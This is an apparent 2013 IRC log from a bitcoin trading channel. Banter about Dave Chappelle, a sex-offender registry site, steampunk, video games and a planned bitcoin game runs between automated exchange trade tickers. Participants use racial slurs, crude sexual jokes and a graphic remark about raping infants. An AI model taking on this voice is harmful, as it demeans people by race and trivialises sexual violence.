a that one i saw cause you linked it Jul 04 05:55:40 I know someone that fucked him Jul 04 05:55:55 dub didn't he die of drugsarebadmmkay aesop ? Jul 04 05:56:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.046 = 0.092 BTC [-] Jul 04 05:56:23 not afaik Jul 04 05:56:32 A white family with the last name niggar, classic Jul 04 05:56:48 yeah I linked that last week Jul 04 05:57:04 [BTCTC] [AMC-PT] 39 @ 0.00225 = 0.0878 BTC [-] Jul 04 05:57:10 dude is underrated, that show is some of the funniest shit ever Jul 04 05:57:15 ddos on Havelock is relentless Jul 04 05:57:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.046 = 0.368 BTC [-] Jul 04 05:58:17 damn Jul 04 05:58:25 udp no doubt? Jul 04 05:58:31 did he do anything else other than that ? Jul 04 05:58:42 bit parts in shit movies Jul 04 05:59:36 stand up Jul 04 05:59:38 seems like made enough off the show to retire on and left it at that Jul 04 05:59:49 Nah he, hated hollywood Jul 04 05:59:53 cause their all schmucks Jul 04 05:59:57 so why didn't he roast the shit out of it then ? Jul 04 06:00:04 that's the problem with people today, no ambition god damned it. Jul 04 06:00:18 because he'd rather retire and take care of his family? Jul 04 06:00:18 on a 100 acre farm Jul 04 06:00:20 he's worth quite a bit Jul 04 06:00:31 enought to throw big ass block parties without caring Jul 04 06:00:32 you said it mircea popescu Jul 04 06:00:41 dude fuck the parties. Jul 04 06:00:53 rickles is telling jokes about how obama visited him but his cleanning rag was broke Jul 04 06:01:03 and this guy is retired and throwing parties. da fuck. Jul 04 06:01:03 everybody thinks they are entitled or something Jul 04 06:01:06 dude that party was the first time the fugee's reunited in some decades Jul 04 06:01:33 no one understood chappelle's comedy except for the legit smart people Jul 04 06:01:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004399 BTC [+] Jul 04 06:01:50 during his last stand up routine he called the populace idiots Jul 04 06:01:52 because they were Jul 04 06:01:53 so the logical progression here is that mpoe-pr retires and raises ugly fucking urchins Jul 04 06:01:55 wtf! Jul 04 06:02:11 that's apple and oranges dude Jul 04 06:02:26 only on the grounds that people being idiots is no reason to retire. Jul 04 06:02:35 [BTCTC] [ASICMINER-PT] 1 @ 4.370003 BTC [-] Jul 04 06:02:40 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [-] Jul 04 06:02:44 you're younger than him and you're fucking retired? Jul 04 06:02:59 do i look retired to you punk ?! Jul 04 06:03:07 but seriously, it didn't catch. retirement is for old people. Jul 04 06:03:07 You said you were retired! Jul 04 06:03:13 i said i tried. Jul 04 06:03:18 [BTCTC] [ASICMINER-PT] 1 @ 4.36 BTC [-] Jul 04 06:03:18 got bored. Jul 04 06:03:52 he did to, so he farms Jul 04 06:04:17 i guess. Jul 04 06:04:21 too* Jul 04 06:04:22 [BTCTC] [AMC-PT] 34 @ 0.00215 = 0.0731 BTC [-] Jul 04 06:04:44 no one understood his comedy, and misused it completely Jul 04 06:04:44 what i meant above tho was i got bored of being retired Jul 04 06:04:48 and laughed for the wrong reasons Jul 04 06:04:56 lmao laughed for the wrong reasons Jul 04 06:04:59 i gotta remember this one. Jul 04 06:05:00 why do something that makes you uncomfortable when you can retired? Jul 04 06:05:00 [BTCTC] [ASICMINER-PT] 1 @ 4.352 BTC [-] Jul 04 06:05:05 [BTCTC] [ASICMINER-PT] 1 @ 4.351 BTC [-] Jul 04 06:05:07 BECAUSE!! Jul 04 06:05:08 retire* Jul 04 06:05:18 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 04 06:05:30 but srsly, ima make a habit of stopping midstroke and going "bitch, you moanin' for ther right reason down there ?" Jul 04 06:05:38 mircea_popescu, you're still in Romania btw ? Jul 04 06:05:42 yea Jul 04 06:06:42 "You know why my show is good? Because the network officials say you're not smart enough to get what I'm doing, and every day I fight for you. I tell them how smart you are. Turns out, I was wrong. You people are stupid." - Chappelle Jul 04 06:06:56 And that was that. Jul 04 06:07:10 [BTCTC] [ASICMINER-PT] 4 @ 4.34 = 17.36 BTC [-] Jul 04 06:07:16 [BTCTC] [ASICMINER-PT] 1 @ 4.330201 BTC [-] Jul 04 06:07:21 [BTCTC] [ASICMINER-PT] 3 @ 4.330201 = 12.9906 BTC [-] Jul 04 06:07:22 fuck that. you don't fight for people. you fight because there's somebody that still dares stand Jul 04 06:07:40 call themselves "network executives", the fucking gall already. Jul 04 06:08:17 uh "I would go to work on the show and I felt awful every day, that's not the way it was. ... I felt like some kind of prostitute or something. If I feel so bad, why keep on showing up to this place? I'm going to Africa. The hardest thing to do is to be true to yourself, especially when everybody is watching." - Chappelle Jul 04 06:09:45 65 acre farm in ohio. that's kinda small for a farm neh ? Jul 04 06:09:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.045 = 0.45 BTC [-] Jul 04 06:09:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 04 06:09:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.044104 = 0.1323 BTC [-] Jul 04 06:09:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.044102 = 0.2205 BTC [-] Jul 04 06:09:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.044101 BTC [-] Jul 04 06:09:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0441 BTC [-] Jul 04 06:09:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [-] Jul 04 06:09:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.044 = 0.528 BTC [-] Jul 04 06:09:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.044 = 0.88 BTC [-] Jul 04 06:10:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.044 = 1.1 BTC [-] Jul 04 06:10:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.044 = 0.44 BTC [-] Jul 04 06:10:19 Not like he's trying to make money... Jul 04 06:10:27 dude has enough to retire. Jul 04 06:10:31 yeah i guess he doesn't farm. Jul 04 06:10:33 hobby farm Jul 04 06:10:38 dude farm. Jul 04 06:12:17 You'd rather see everyone sell out Mr. Popescu like Eddie Murphy? Jul 04 06:12:46 while nodding off last night I put on The Heist Jul 04 06:12:56 and witnessed the husk of Eddie Murphy Jul 04 06:13:06 Tower Heist? Jul 04 06:13:06 no wait Jul 04 06:13:08 yeha Jul 04 06:13:09 that Jul 04 06:13:09 the example i gave was rickles. Jul 04 06:13:15 the guy is 80 and still mocking the president Jul 04 06:13:18 If I had teh choice between fighting for the american public and sitting back on my porch with my purple drank.. I've got some bad news for the public Jul 04 06:13:19 what's murphy to do in this Jul 04 06:14:06 dub srsly, nobody ever fights for "the public". for one, noboduy cares about the public, starting with the public itself. Jul 04 06:14:10 He also played a talking Mr. Potato Head...... Jul 04 06:14:20 the problem with fighting for the american public, is they would not only not give a fuck, they would likely accuse of some kind of offense for doing so Jul 04 06:14:30 he wasn't fighting for the public Jul 04 06:14:31 hey Jul 04 06:14:34 he was fighting for his fans Jul 04 06:14:40 mp you toook words out of my mouth Jul 04 06:14:51 the only valid reason to fight is that there's some other guy over therer. that's it. Jul 04 06:15:02 fighting is never for. fighting is always against. Jul 04 06:15:13 as long as anything at all's left standing there's your fight cut out for ye. Jul 04 06:15:30 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 04 06:15:38 and what, playing potatohead is a crime ?! Jul 04 06:16:03 his head looks like a fucking potato. Jul 04 06:16:10 explain the potatohead thing? Jul 04 06:16:12 Tower Heist was def a crime Jul 04 06:16:35 Dude was in Toy Story, how is that not selling out? Jul 04 06:16:49 but toy story didnt suck Jul 04 06:16:52 unrelated: spent a bit of time at a club called potatohead in bali http://www.ptthead.com/ Jul 04 06:17:10 fucking baller Jul 04 06:17:11 thestringpuller what's your definition of serlling out ?! Jul 04 06:17:36 potatohead = uncle tom/housenigger? Jul 04 06:17:52 i thought it meant degrading yourself for money Jul 04 06:17:56 dub no no, rickles played some cartoon voice Jul 04 06:18:00 or, a lot of money Jul 04 06:18:12 oh right Jul 04 06:18:12 i don't grok how voicing a cartoon qualifies Jul 04 06:18:20 [BTCTC] [BFMINES] 65 @ 0.004 = 0.26 BTC Jul 04 06:18:21 but some people think selling out is simply making too much money according to them Jul 04 06:18:28 my definition doesn't matter. as an artist if you feel your art isn't understood you have a right to quit making it. Jul 04 06:18:39 even moreover Jul 04 06:18:42 you have a rioght to quit making it for any reason you please Jul 04 06:18:48 or no reason at all for that matter. Jul 04 06:18:50 if you don't want to make it anymore you shouldn't have it Jul 04 06:18:54 to* Jul 04 06:18:57 word. Jul 04 06:19:27 I'd rather Chappelle retire at his prime than turn into Bill Cosby. Jul 04 06:19:40 wait i have a better projected definition of selling out Jul 04 06:19:46 bil cosby wasn't that bad was he ? the fucking cake sketch was late Jul 04 06:20:09 when someone you idolize compromises your idolizing them Jul 04 06:20:11 ;;google kids mentally retarded cosby Jul 04 06:20:13 Bill Cosby Slams Republicans Who Sat Through SOTU - Mediaite.com: ; The Cosby Show - Entertainment Weekly: ; Pius Kamau: Bill Cosby Forgot Mental Illness - Huffington Post: (1 more message) Jul 04 06:20:23 uh Jul 04 06:20:33 fucking pointless press spamming google. fucking spamsite google. Jul 04 06:20:58 [BTCTC] [BFMINES] 8 @ 0.004 = 0.032 BTC Jul 04 06:21:34 So you have seen kids say the darndest things. Jul 04 06:21:53 sure Jul 04 06:23:27 Not everyone can be Richard Pryor yo Jul 04 06:23:53 jacksonville "news" page, Sex Offenders gets its own top-level nav button and subdomain Jul 04 06:23:56 http://sexoffenders.news4jax.com/ Jul 04 06:23:59 Sex Offenders Jul 04 06:24:55 boosh my bookshelf is here Jul 04 06:25:18 all male Jul 04 06:25:27 interesting. we should have female quotas of sex offending Jul 04 06:25:32 if there's university quotas... Jul 04 06:25:54 i like how some of them are smiling Jul 04 06:25:57 lol Jul 04 06:26:18 oh it's randomized Jul 04 06:26:24 new pics every page load Jul 04 06:26:34 a woman! Jul 04 06:26:41 http://sexoffenders.news4jax.com/offender/kristina-hartless/87084 Jul 04 06:26:43 KRISTINA HARTLESS | Sex Offenders Jul 04 06:26:53 http://sexoffenders.news4jax.com/offender/sheila-swearingen/881 Jul 04 06:26:54 Sheila SWEARINGEN | Sex Offenders Jul 04 06:26:56 i have one too Jul 04 06:27:18 yours is way better Jul 04 06:27:37 no details to offense Jul 04 06:27:43 still. da fuck is this. no term no nothing Jul 04 06:27:58 all sex offenders are child molesters i guess Jul 04 06:28:03 did they fuck a goat ? grab some woman's tit in the metro ? rape 6 month old twins with the toilet brush ? Jul 04 06:28:39 driving me crazy that the havent poste dthe latest newcast yet Jul 04 06:28:48 it had retarded interviews Jul 04 06:29:11 and announcer pointing at shaded areas around courthouse where offender could hide Jul 04 06:29:18 so bad Jul 04 06:29:57 one woman was all "What am I sposed to do, bring someone with me every time I go to the courthouse?!" Jul 04 06:30:08 wtf you going to the courthouse so much for Jul 04 06:30:32 (she didnt claim to be an employee) Jul 04 06:31:01 i go to the courthouse all the time. for one , i know half the bar Jul 04 06:31:10 for the other, wtf. it's the courthouse. in the middle of town Jul 04 06:31:34 [BTCTC] [AMC-PT] 40 @ 0.00215 = 0.086 BTC [-] Jul 04 06:31:34 the dude is a free man right? Jul 04 06:32:05 sex offender spotted buying apples, be on alert Jul 04 06:32:30 i think the alert and "safety" are the new anon Jul 04 06:32:36 which is the new steampunk Jul 04 06:32:43 [BTCTC] [BFMINES] 8 @ 0.004 = 0.032 BTC Jul 04 06:32:44 Clueless is like the best movie ever made. Jul 04 06:32:45 which is the new "i'm too lame for anyone else to give a shit" Jul 04 06:32:57 i cant keep with all this Jul 04 06:33:04 can we just call it all one thing? Jul 04 06:33:22 up* Jul 04 06:33:42 x30 2,491.6142 @ 76.99061966 USD Jul 04 06:33:44 o___O Jul 04 06:33:59 ;;ticker Jul 04 06:33:59 ;;ticker Jul 04 06:34:00 MtGox BTCUSD ticker | Best bid: 77.86811, Best ask: 78.39800, Bid-ask spread: 0.52989, Last trade: 78.39990, 24 hour volume: 81948.79798309, 24 hour low: 76.00000, 24 hour high: 90.79700, 24 hour vwap: 82.44248 Jul 04 06:34:01 MtGox BTCUSD ticker | Best bid: 77.86811, Best ask: 78.39800, Bid-ask spread: 0.52989, Last trade: 78.39990, 24 hour volume: 81948.79798309, 24 hour low: 76.00000, 24 hour high: 90.79700, 24 hour vwap: 82.44248 Jul 04 06:34:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.043359 = 0.4336 BTC [-] Jul 04 06:34:46 "Sentiments such as creativity, individuality, morality and the sanctity of life have no meaning in such a world" Jul 04 06:34:59 the steampunk kid is such a pie of mainstream Jul 04 06:35:17 [BTCTC] [CRYPTO-TRADE] 25 @ 0.2 = 5 BTC [+] Jul 04 06:35:18 in a steampunky world? Jul 04 06:35:20 he writes these collegiate essay type of things that are just awful outside of the college Jul 04 06:35:32 like minced brain. Jul 04 06:35:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.044999 = 0.135 BTC [+] Jul 04 06:35:46 the fucking sentiment of creativity. Jul 04 06:35:54 "Sentiments such as creativity, individuality, morality and the sanctity of life have no meaning in such a world" isn't that like ultimate irony? Jul 04 06:36:05 wtf Jul 04 06:36:25 Over the course of the film, Lowry dreams of a beautiful woman who he finally meets in life and who he struggles to help save from the bureaucratic system. While the story is well done and engaging, the most important part of Brazil is not the plot, but rather the horrific world that is occurs in. Jul 04 06:36:40 he's basically watched brazil for naught. Jul 04 06:37:38 [BTCTC] [ASICMINER-PT] 1 @ 4.388994 BTC [+] Jul 04 06:37:56 he uses his creativity, individuality, and judgement to desanctify creativity, individuality, morality and the sanctity of life Jul 04 06:38:11 kid's a cliche wrapped in a platitude, dipped in corny and now resting on a boilerplate Jul 04 06:38:38 The story of Nikola Tesla is one of the great personal tragedies of modern history. Arguably one of the greatest scientific geniuses of all time, Tesla faced poverty, slander and persecution during his lifetime. Jul 04 06:38:42 unlike... you know... everyone else. Jul 04 06:39:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.044999 = 0.45 BTC [+] Jul 04 06:39:11 gogo bitcoin lower Jul 04 06:39:15 But Telsa came into conflict with Thomas Edison, America’s foremost inventor at the time, and Edison’s superior sense of business and advertising destroyed Tesla’s reputation and left him and many of his ideas frustrated and unfulfilled. Thankfully, with the rise of steampunk and a renewed interest in nineteenth century science, Tesla has come back into the public eye and, one hopes, will finally get the recognit Jul 04 06:39:15 ion he deserves. Jul 04 06:39:18 is Tesla the steampunk Jesus? Jul 04 06:39:22 yup. Jul 04 06:39:26 tesla is steampunk satoshi. Jul 04 06:39:30 lol Jul 04 06:39:41 they shouldn't call it steampunk, there is no punk in steampunk Jul 04 06:39:46 its just cogs and people dressing fancy Jul 04 06:39:51 i wonder who the steampunk fat chick that broke the bike is Jul 04 06:39:57 cyberpunk is gritty by definition Jul 04 06:40:05 taub_ yea we've kinda been over that lolzpile Jul 04 06:40:06 is Jacques Cousteau in there somewhere? Jul 04 06:40:15 and ChronoTrigger? Jul 04 06:40:17 hmmm... he did have goggles... Jul 04 06:40:25 and that weird fucking boat... Jul 04 06:40:29 [BTCTC] [ASICMINER-PT] 6 @ 4.388991 = 26.3339 BTC [-] Jul 04 06:40:37 and he was french. so i guess so. Jul 04 06:41:19 [BTCTC] [ASICMINER-PT] 4 @ 4.38899 = 17.556 BTC [-] Jul 04 06:41:29 what will steampunks turn to after they get their own tv show? Jul 04 06:41:38 vampires are ruined now Jul 04 06:41:44 zombies, goth, emo Jul 04 06:41:47 http://en.wikipedia.org/wiki/Weekend_at_the_Asylum Jul 04 06:41:48 all devoured Jul 04 06:41:49 pic related. Jul 04 06:42:19 looks like a civil war renenactment Jul 04 06:42:34 basically they got huddled into a corner by some buyreaucrats Jul 04 06:42:38 reeanactment* Jul 04 06:42:39 and that's that. Jul 04 06:44:00 ok that pic confirms this is band geeks stage 2 Jul 04 06:44:15 da fuck does Chrono Trigger have to do with Steam Punk? Jul 04 06:44:17 [BTCTC] [AMC-PT] 6 @ 0.00215 = 0.0129 BTC [-] Jul 04 06:44:46 [BTCTC] [BTC-BOND] 71 @ 0.009902 = 0.703 BTC [-] Jul 04 06:44:56 it was steampunky and i am assuming there are a fair amount of steamers that playe dit Jul 04 06:45:08 and steamers are likely also gamers Jul 04 06:45:09 at this rate you'll end up mixing fallout in Jul 04 06:45:19 never played fallout Jul 04 06:45:26 Steam powered time travel? Jul 04 06:45:28 to your detriment. Jul 04 06:45:30 The fuuuuck? Jul 04 06:45:31 ahahaha Jul 04 06:45:40 did westinghouse invent that ? Jul 04 06:45:41 i quit gaming for a long spell Jul 04 06:45:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.044999 = 0.135 BTC [+] Jul 04 06:45:56 missed a lot Jul 04 06:45:57 I don't remember much steam punk at all in Chrono Trigger... Jul 04 06:46:19 I remember a lot of random ass time travel though. Jul 04 06:46:25 i recall lotsa mixing of mechanical steam-powere stuff Jul 04 06:46:27 [BTCTC] [BTC-BOND] 1 @ 0.009902 BTC [-] Jul 04 06:46:47 There was a lot of electricity in that game. Jul 04 06:46:51 And lavos Jul 04 06:46:53 and it was a riff on popular rpg genre Jul 04 06:46:53 lots of lavos Jul 04 06:47:18 i think arcanum obscura thing is the one steampunk title Jul 04 06:47:27 http://media1.gameinformer.com/imagefeed/featured/square-enix/chronotrigger/chrono0512-610.jpg Jul 04 06:47:40 it was pretty good at its time Jul 04 06:48:06 steampunk robot and character to his right Jul 04 06:48:10 Robo was like the only steam powered thing. Jul 04 06:48:18 And maybe the steam powered ship Jul 04 06:48:50 lavos is a lot like cthulu now that I think of it Jul 04 06:49:17 left enuf of an impression for me to remember 20 yrs later or whatever Jul 04 06:50:12 [BTCTC] [DMS.PURCHASE] 25 @ 0.049273 = 1.2318 BTC [+] Jul 04 06:50:43 [BTCTC] [ASICMINER-PT] 1 @ 4.388995 BTC [+] Jul 04 06:51:20 [BTCTC] [DMS.PURCHASE] 25 @ 0.049273 = 1.2318 BTC [+] Jul 04 06:52:11 I think Final Fantasy 6 was more steam punk than Chrono Trigger tbh Jul 04 06:52:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.044999 BTC [+] Jul 04 06:52:37 6 was a US release? Jul 04 06:52:44 yup Jul 04 06:52:50 it was ff3 on the SNES in the US Jul 04 06:52:55 ah ok Jul 04 06:53:06 ff2 was the shit Jul 04 06:53:11 3 and 5 were never released in the US Jul 04 06:53:19 i played 5 on roms Jul 04 06:53:21 i think Jul 04 06:53:47 where is mircea ryan Jul 04 06:53:57 is he over there building bitcoin rapture Jul 04 06:54:07 NO GODS OR KINGS Jul 04 06:54:11 ONLY BITCOIN Jul 04 06:54:22 oh that reminds me Jul 04 06:54:32 i had a question about the game Jul 04 06:54:38 [BTCTC] [AMC-PT] 605 @ 0.002199 = 1.3304 BTC [+] Jul 04 06:54:45 will battles or drops involve bitcoins too? Jul 04 06:54:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.044999 = 0.09 BTC [+] Jul 04 06:54:54 since there's no "gold" Jul 04 06:55:15 nah, itams. Jul 04 06:55:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.044999 = 0.9 BTC [+] Jul 04 06:55:29 word Jul 04 06:56:22 will there be hats? Jul 04 06:56:40 ie useless items that cost bitcoins Jul 04 06:56:54 well eventually there will be anything. Jul 04 06:56:55 TF2 references :P Jul 04 06:57:07 never played that either Jul 04 06:57:09 prolly not going to waste art time on it at the start. Jul 04 06:57:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004399 BTC [+] Jul 04 06:57:37 i have the chrono trigger theme stuck in my head Jul 04 06:57:42 dont be all timid about custom 3d models for items, shit drives me crazy Jul 04 06:57:44 like WoW Jul 04 06:57:51 they have a bajillion $ Jul 04 06:58:00 and re-use models like 20 times Jul 04 06:58:03 they also waste a lot of money Jul 04 06:58:30 Blizzard is currently propping up Activision since they have like products Jul 04 06:58:40 well if you want a hat one of the easiest ways is to make it. Jul 04 06:58:56 there will be a modeler? Jul 04 06:59:46 nah Jul 04 06:59:47 well a bunch. Jul 04 07:00:16 i'm really looking forward to this game Jul 04 07:00:35 great thing for bitcoin Jul 04 07:02:36 :D Jul 04 07:02:40 morrowind Jul 04 07:03:22 I still think you're hedging too much on emergent gameplay early on Jul 04 07:03:37 but perhaps that is a risk worth taking. Jul 04 07:03:57 how can you say he's too anything when it's like 10 days old Jul 04 07:04:35 let it marinate Jul 04 07:06:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.044999 BTC [+] Jul 04 07:06:46 [BTCTC] [GSDPT] 2 @ 0.00238 = 0.0048 BTC [+] Jul 04 07:08:03 For that very reason. Jul 04 07:08:17 Emergent gameplay depends on an established player-base. Jul 04 07:08:40 cuz 99% of bitcoiners aren't gamers? Jul 04 07:08:54 I don't think you're getting it. Jul 04 07:09:01 probly not Jul 04 07:09:30 [BTCTC] [ASICMINER-PT] 1 @ 4.400001 BTC [+] Jul 04 07:09:37 as i see it, S.MG is bringing a product to an appropriate community Jul 04 07:09:52 and they have chosen a genre likely to be accepted by that community Jul 04 07:09:58 [BTCTC] [S.BBET-PT] 39 @ 0.0018 = 0.0702 BTC [-] Jul 04 07:10:00 [BTCTC] [S.BBET-PT] 1 @ 0.00189 BTC [+] Jul 04 07:10:29 [BTCTC] [ASICMINER-PT] 7 @ 4.340021 = 30.3801 BTC [-] Jul 04 07:10:49 75.8 Jul 04 07:11:29 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [-] Jul 04 07:12:11 Player based emergent depends on simple interactions between players. With a limited player space, you have limited emergence meaning the full experience isn't evident for some X duration. Jul 04 07:12:30 As the player space grows that is. Jul 04 07:12:35 [BTCTC] [ASICMINER-PT] 1 @ 4.3303 BTC [-] Jul 04 07:12:54 Star Wars Galaxies during it's launch is a really good example. Jul 04 07:13:25 [BTCTC] [ASICMINER-PT] 2 @ 4.45 = 8.9 BTC [+] Jul 04 07:13:54 so everyone plays on 1 server Jul 04 07:13:57 [BTCTC] [ASICMINER-PT] 3 @ 4.45 = 13.35 BTC [+] Jul 04 07:14:09 [BTCTC] [ASICMINER-PT] 10 @ 4.45 = 44.5 BTC [+] Jul 04 07:14:14 that's irrelevant, the full play experience won't be evident for at least a year Jul 04 07:14:31 you dont think that can be designed around? Jul 04 07:14:43 By doing what? Jul 04 07:14:48 using brains Jul 04 07:15:05 [BTCTC] [ASICMINER-PT] 2 @ 4.3303 = 8.6606 BTC [-] Jul 04 07:15:10 Like connecting a bunch of precogs in some array? Jul 04 07:16:21 [BTCTC] [ASICMINER-PT] 1 @ 4.3303 BTC [-] Jul 04 07:16:28 [BTCTC] [ASICMINER-PT] 2 @ 4.330201 = 8.6604 BTC [-] Jul 04 07:16:33 [BTCTC] [ASICMINER-PT] 4 @ 4.3302 = 17.3208 BTC [-] Jul 04 07:16:38 [BTCTC] [ASICMINER-PT] 2 @ 4.330105 = 8.6602 BTC [-] Jul 04 07:17:18 solving problems does not require magic Jul 04 07:17:54 it does if you expect player made things to magically appear during launch Jul 04 07:17:57 you don't even know 5% of how the game will exist Jul 04 07:18:09 you're the precog here it seems Jul 04 07:18:17 indeed Jul 04 07:18:26 oook so the good news is i've just been shown the server working Jul 04 07:18:34 looks like we're perhaps gonna actually be early. Jul 04 07:18:48 sorry not emergent enough for me Jul 04 07:18:51 i'm not interested Jul 04 07:18:57 how many people are working on this ? Jul 04 07:19:21 a few. Jul 04 07:19:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.044999 = 0.45 BTC [+] Jul 04 07:19:59 a few = 3 or not 3 Jul 04 07:20:00 thestringpuller i don't think the "full play experience" will be evident period. as i imagine it'll keep on changing Jul 04 07:20:03 sorta like history. Jul 04 07:20:11 few like closer to a dozen by now. Jul 04 07:20:36 nice Jul 04 07:21:25 sounded like you have bad news too? Jul 04 07:21:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.0459 = 0.459 BTC [+] Jul 04 07:21:33 nope. Jul 04 07:21:42 but i am going to bed, so. take care. Jul 04 07:21:48 adios Jul 04 07:22:01 see you Jul 04 07:22:13 a game based on player's constructing the world is limited. their contributions are as finite as the economy proposed. this means at launch there is 0, and everything is being hedged to getting to 1. Jul 04 07:22:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.0459 = 0.2295 BTC [+] Jul 04 07:22:28 dude, the game isn't based on players constructing anything. Jul 04 07:22:39 the game is however not going to prevent players from constructing useful shit. Jul 04 07:22:43 huge difference there. Jul 04 07:22:58 you want a fedora in wow ? fuck you. Jul 04 07:23:08 they'll do it if/when they get around to it, if they even feel like doing it. Jul 04 07:23:16 thestringpuller, this game will mostly consist of all that you fear most Jul 04 07:23:35 no point fighting it it seems Jul 04 07:23:44 lol ? Jul 04 07:23:58 i just mean he's looking for problems Jul 04 07:24:12 not sure why really Jul 04 07:24:25 it'll be great, because if playerbase goes "meh, there's no flying horses" i'm just gonna go well, have you made flying horse models ? Jul 04 07:24:43 best of both worlds. Jul 04 07:24:47 lotsa ugly horses flying around Jul 04 07:24:52 a, no. Jul 04 07:24:52 lawl Jul 04 07:25:00 i'm not putting ugly horses in. Jul 04 07:25:04 good Jul 04 07:25:09 make them fucking beautiful or go home Jul 04 07:25:42 mircea_popescu: you stated there are no towns Jul 04 07:25:47 those will be player created Jul 04 07:25:51 i said player controlled yea Jul 04 07:25:54 or did I misread Jul 04 07:26:03 so the towns will be created by designers? Jul 04 07:26:06 anyway, bed. we continue tomorro. Jul 04 07:26:13 Python interface unloaded Jul 04 07:26:13 Tcl interface unloaded **** ENDING LOGGING AT Thu Jul 4 07:26:13 2013 **** BEGIN LOGGING AT Thu Jul 4 14:08:57 2013 Jul 04 14:09:04 [BTCTC] [DMS.MINING] 8 @ 0.02 = 0.16 BTC [-] Jul 04 14:09:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.0464 = 0.1392 BTC [-] Jul 04 14:09:07 [BTCTC] [DMS.MINING] 5 @ 0.02 = 0.1 BTC [-] Jul 04 14:10:10 [BTCTC] [TAT.ASICMINER] 99 @ 0.0465 = 4.6035 BTC [+] Jul 04 14:10:48 [BTCTC] [AMC-PT] 35 @ 0.0023 = 0.0805 BTC [-] Jul 04 14:10:55 [BTCTC] [DMS.PURCHASE] 5 @ 0.049273 = 0.2464 BTC [+] Jul 04 14:11:54 [BTCTC] [BITVPS] 10 @ 0.002016 = 0.0202 BTC [-] Jul 04 14:11:56 [BTCTC] [BITVPS] 20 @ 0.002015 = 0.0403 BTC [-] Jul 04 14:15:21 [HAVELOCK] [HIM] 4 @ 0.32 = 1.28 BTC [+] Jul 04 14:16:50 [HAVELOCK] [ASICM] 2 @ 0.042792 = 0.0856 BTC [+] Jul 04 14:18:27 [BTCTC] [BASIC-MINING] 2 @ 0.1541 = 0.3082 BTC [-] Jul 04 14:18:49 [HAVELOCK] [ASICM] 305 @ 0.042792 = 13.0516 BTC [+] Jul 04 14:18:53 [HAVELOCK] [ASICM] 2 @ 0.042792 = 0.0856 BTC [+] Jul 04 14:20:35 [HAVELOCK] [ASICM] 3 @ 0.042792 = 0.1284 BTC [+] Jul 04 14:26:13 [HAVELOCK] [ASICM] 1 @ 0.042792 BTC [+] Jul 04 14:27:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04553 BTC [-] Jul 04 14:27:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.045 = 0.36 BTC [-] Jul 04 14:27:26 [BTCTC] [BFMINES] 603 @ 0.004 = 2.412 BTC Jul 04 14:27:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.045 = 0.36 BTC [-] Jul 04 14:27:33 [BTCTC] [AMC-PT] 250 @ 0.00232 = 0.58 BTC [+] Jul 04 14:27:39 [BTCTC] [BASIC-MINING] 2 @ 0.1541 = 0.3082 BTC [-] Jul 04 14:29:20 [BTCTC] [AMC-PT] 61 @ 0.002325 = 0.1418 BTC [+] Jul 04 14:29:47 [HAVELOCK] [ASICM] 2 @ 0.042788 = 0.0856 BTC [-] Jul 04 14:31:07 [BTCTC] [AMC-PT] 114 @ 0.00235 = 0.2679 BTC [+] Jul 04 14:32:02 [HAVELOCK] [ASICM] 2 @ 0.042788 = 0.0856 BTC [-] Jul 04 14:32:30 [HAVELOCK] [ASICM] 2 @ 0.042787 = 0.0856 BTC [-] Jul 04 14:32:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [+] Jul 04 14:33:34 [HAVELOCK] [ASICM] 47 @ 0.042784 = 2.0108 BTC [-] Jul 04 14:33:51 [BTCTC] [ASICMINER-PT] 1 @ 4.779897 BTC [+] Jul 04 14:34:16 [HAVELOCK] [HIM] 6 @ 0.32 = 1.92 BTC [+] Jul 04 14:34:51 [HAVELOCK] [ASICM] 7 @ 0.042798 = 0.2996 BTC [+] Jul 04 14:34:58 [HAVELOCK] [ASICM] 6 @ 0.042798 = 0.2568 BTC [+] Jul 04 14:37:32 [HAVELOCK] [ASICM] 188 @ 0.042798 = 8.046 BTC [+] Jul 04 14:37:33 [HAVELOCK] [ASICM] 656 @ 0.042799 = 28.0761 BTC [+] Jul 04 14:37:34 [HAVELOCK] [ASICM] 287 @ 0.0428 = 12.2836 BTC [+] Jul 04 14:37:35 [HAVELOCK] [ASICM] 100 @ 0.04289999 = 4.29 BTC [+] Jul 04 14:37:36 [HAVELOCK] [ASICM] 100 @ 0.04389999 = 4.39 BTC [+] Jul 04 14:37:37 [HAVELOCK] [ASICM] 69 @ 0.04489999 = 3.0981 BTC [+] Jul 04 14:38:38 [BTCTC] [ASICMINER-PT] 6 @ 4.601122 = 27.6067 BTC [-] Jul 04 14:38:43 [BTCTC] [ASICMINER-PT] 1 @ 4.6011 BTC [-] Jul 04 14:38:53 [BTCTC] [ASICMINER-PT] 6 @ 4.601 = 27.606 BTC 